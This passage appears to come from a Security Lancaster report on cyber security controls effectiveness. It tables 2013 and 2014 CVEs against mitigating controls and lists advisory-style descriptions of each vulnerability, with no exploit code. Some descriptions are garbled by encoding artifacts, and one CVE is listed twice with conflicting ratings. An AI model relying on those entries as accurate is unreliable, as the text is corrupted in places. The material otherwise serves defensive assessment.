CVE-2013-3897 | y n y y n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y y n y n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y n y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n n n n n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y y n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n y y n n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y y y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n n y n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y n n y n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n n n y n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y n n y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y n y n n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n n y n n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n n n n n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y y y n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y y y y y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y y y n y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n n y n y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y n y y n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y n n y n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y y y y n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y y y n y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y y y y y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y y y y y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y y y y y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n y y y y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y y y y y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y n n n y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y n n n n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y n y y y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y y y y y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y y y y y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y y y y y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n n n n n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n n n n n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n y y n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n n y n n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n y n n n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n n n n n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n n n y n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n n n n n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n n y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y n y n y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y y y n n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n n n n n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n n n n n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n n n n n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y y y y n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y y y y y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y y n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n n y n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n y y n n | Not Mitigated |Mitigated - Firewall, Patch Management
CVE-2014-7927 | y y y y n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y y y y n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y y y y y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y y y y y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y y y y y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y y y y n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-9357 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allows remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CYBER SECURITY CONTROLS EFFECTIVENESS, Security Lancaster. Page 19 of 28
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JC*, JCB*, JD*, JDB*, JE*, JF*, JFB*, JFC*, JG*, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before build 18514, and 2.5.1 through 2.5.3 before build 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
